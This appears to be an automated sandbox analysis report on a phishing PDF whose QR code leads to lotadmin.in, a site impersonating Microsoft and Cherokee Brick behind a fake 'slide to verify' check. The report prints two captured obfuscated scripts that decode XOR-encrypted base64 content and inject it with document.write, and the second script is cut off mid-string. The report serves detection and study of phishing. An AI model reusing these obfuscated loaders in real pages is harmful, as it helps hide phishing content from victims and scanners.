Windows Analysis Report
Employee_Letter.pdf

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://lotadmin.in

{
  "contains_trigger_text": true,
  "trigger_text": "Please verify to continue",
  "prominent_button_name": "Slide to verify",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false
}

{
    "contains_trigger_text": true,
    "trigger_text": "Scan the QR code below to access your personalized bonus details.",
    "prominent_button_name": "Scan Here to View Bonus Details:",
    "text_input_field_labels": "unknown",
    "pdf_icon_visible": false,
    "has_visible_captcha": false,
    "has_urgent_text": false,
    "has_visible_qrcode": true,
    "contains_chinese_text": false
}

{
  "contains_trigger_text": true,
  "trigger_text": "Please verify to continue",
  "prominent_button_name": "Slide to verify",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": true,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false
}

{
  "brands": [
    "Microsoft"
  ]
}

{
  "brands": [
    "Cherokee Brick"
  ]
}

{
  "brands": [
    "Cherokee Brick"
  ]
}

{
    "risk_score": 8,
    "reasoning": "High-risk behavior detected: Script uses base64 encoding (obfuscation) and XOR decryption to hide content, followed by document.write() to inject decoded content directly into the DOM. This pattern is commonly used in malware to hide malicious payloads. The use of document.write() is particularly dangerous as it can completely overwrite the page content with potentially malicious HTML/JavaScript."
}

        var key = "secretkey";
        var encodedHtml = "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";
        var decryptedHtml = atob(encodedHtml).split("").map((c, i) => 
            String.fromCharCode(c.charCodeAt(0) ^ key.charCodeAt(i % key.length))).join("");
        document.write(decryptedHtml);
    

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.",    "The URL 'lotadmin.in' does not match the legitimate domain name for Microsoft.",    "The domain 'lotadmin.in' does not contain any recognizable association with Microsoft.",    "The use of a different domain extension '.in' and an unrelated domain name is suspicious.",    "No subdomain or recognizable Microsoft-related keywords are present in the URL."  ],  "riskscore": 9}
Google indexed: True

{
    "risk_score": 8,
    "reasoning": "High-risk indicators present: Script contains heavily obfuscated code (base64/encoded string) (+3), uses a 'secretkey' variable suggesting potential cryptographic operations (+2), and the length and structure of the encoded content suggests complex operations hidden from view (+2). Additional risk due to suspicious encoding pattern (+1)."
}

var key = "secretkey";
var encodedScript = "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

```json{  "legit_domain": "cherokeebrick.com",  "classification": "known",  "reasons": [    "The brand 'Cherokee Brick' is a known brand associated with brick manufacturing.",    "The URL 'lotadmin.in' does not match the legitimate domain 'cherokeebrick.com'.",    "The domain 'lotadmin.in' does not have any apparent connection to the brand 'Cherokee Brick'.",    "The use of a different domain extension '.in' and unrelated domain name is suspicious.",    "No input fields information provided, which limits further analysis."  ],  "riskscore": 8}
Google indexed: True

URL: lotadmin.in
			Brands: Cherokee Brick
			Input Fields: unknown